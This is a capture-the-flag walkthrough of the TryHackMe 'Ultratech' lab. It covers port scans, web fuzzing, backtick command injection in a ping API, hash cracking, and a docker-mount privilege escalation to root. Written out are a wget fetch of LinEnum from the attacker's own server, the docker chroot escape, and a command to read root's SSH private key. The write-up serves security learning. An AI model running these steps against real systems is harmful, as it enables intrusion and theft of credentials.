TryHackMe - Ultratech

• Room

Nmap

┌──(root💀kali)-[~]
└─# nmap -T4 -sC -sV -O -Pn -p- 10.10.12.178 
Nmap scan report for 10.10.12.178
Host is up (0.21s latency).
Not shown: 65531 closed tcp ports (reset)
PORT      STATE SERVICE VERSION
21/tcp    open  ftp     vsftpd 3.0.3
22/tcp    open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 dc:66:89:85:e7:05:c2:a5:da:7f:01:20:3a:13:fc:27 (RSA)
|   256 c3:67:dd:26:fa:0c:56:92:f3:5b:a0:b3:8d:6d:20:ab (ECDSA)
|_  256 11:9b:5a:d6:ff:2f:e4:49:d2:b5:17:36:0e:2f:1d:2f (ED25519)
8081/tcp  open  http    Node.js Express framework
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
|_http-cors: HEAD GET POST PUT DELETE PATCH
31331/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: UltraTech - The best of technology (AI, FinTech, Big Data)
|_http-server-header: Apache/2.4.29 (Ubuntu)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.92%E=4%D=5/26%OT=21%CT=1%CU=38541%PV=Y%DS=4%DC=I%G=Y%TM=628F871
OS:3%P=x86_64-pc-linux-gnu)SEQ(SP=103%GCD=1%ISR=10B%TI=Z%CI=I%II=I%TS=A)OPS
OS:(O1=M506ST11NW7%O2=M506ST11NW7%O3=M506NNT11NW7%O4=M506ST11NW7%O5=M506ST1
OS:1NW7%O6=M506ST11)WIN(W1=68DF%W2=68DF%W3=68DF%W4=68DF%W5=68DF%W6=68DF)ECN
OS:(R=Y%DF=Y%T=40%W=6903%O=M506NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A
OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R
OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%
OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD
OS:=S)

Network Distance: 4 hops
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 817.68 seconds

WFuzz on port 8081

┌──(root💀kali)-[~]
└─# wfuzz -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-small.txt -u http://10.10.12.178:8081/FUZZ --hc 404 
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://10.10.12.178:8081/FUZZ
Total requests: 87664

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                                                                                                                     
=====================================================================
[STRIPPED]                                                                                                                                                                      
000002579:   200        0 L      8 W        39 Ch       "auth"                                                                                                                                                                      
000003709:   500        10 L     61 W       1094 Ch     "ping"                                                                                                                                                                      
000033607:   500        10 L     61 W       1094 Ch     "Ping"                                                                                                                                                                                                                                                                                                                     
000076294:   200        0 L      8 W        39 Ch       "Auth"                                                                                                                                                                      

Total time: 2554.824
Processed Requests: 87664
Filtered Requests: 87645
Requests/sec.: 34.31311

Task 2

• Which software is using the port 8081? Node.js

• Which other non-standard port is used? 31331

• Which software using this port? Apache

• Which GNU/Linux distribution seems to be used? Ubuntu

• The software using the port 8081 is a REST api, how many of its routes are used by the web application? (response is found using wfuzz) 2

Task 3

• We have an auth endpoint that requires user and password
• We also have a ping endpoint but it seems to need a parameter as well
• We could try to pass it an ip
• In ctf this kind of features often leads to cmd injection so we could try a command using backticks because it takes precedence over other commands (I tried with pipes and other ways but it did not work) , and it works
• Let's try an ls
• We get the name of the db file!
• If we cat the fil we get password hashes for an admin and a user called r00t
• If crack the hash with crackstation we get the password
• We can do the same for the admin password

Questions

• There is a database lying around, what is its filename? utech.db.sqlite

• What is the first user's password hash? I will let you find it on your own

About port 31331 - alternative way to foothold

• We could also find things by checking the robots.txt file
• We discover a sitemap
• There is a partner page that we can not find when looking at the website. It is a login page
• We can check the source code and this way we discover the auth endpoint of the api
• We can then analyze the code of the api.js file http://10.10.12.178:31331/js/api.js
• This way we discover the ping endpoint http://${getAPIURL()}/ping?ip=${window.location.hostname}

Task 4 - Privesc

• Let's try to ssh with the found passwords. It works!
• Let's enumerate our ways to privesc with linenum
• We take it in our attacking machine wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh/

• We serve it to our target with python server python3 -m http.server 80

• We get it to our target wget http://10.13.22.56/LinEnum.sh

• We make it executable chmod +x LinEnum.sh we have an interesting output here
• Let's have a look at gtfobins and search for docker, we find this(https://gtfobins.github.io/gtfobins/docker/) and we have an interesting command docker run -v /:/mnt --rm -it alpine chroot /mnt sh except instead of alpine we want to use bash

• docker run -v /:/mnt --rm -it bash chroot /mnt sh and we get root!
• Let's take the chars of the root ssh key as requested in the question cat /root/.ssh/id_rsa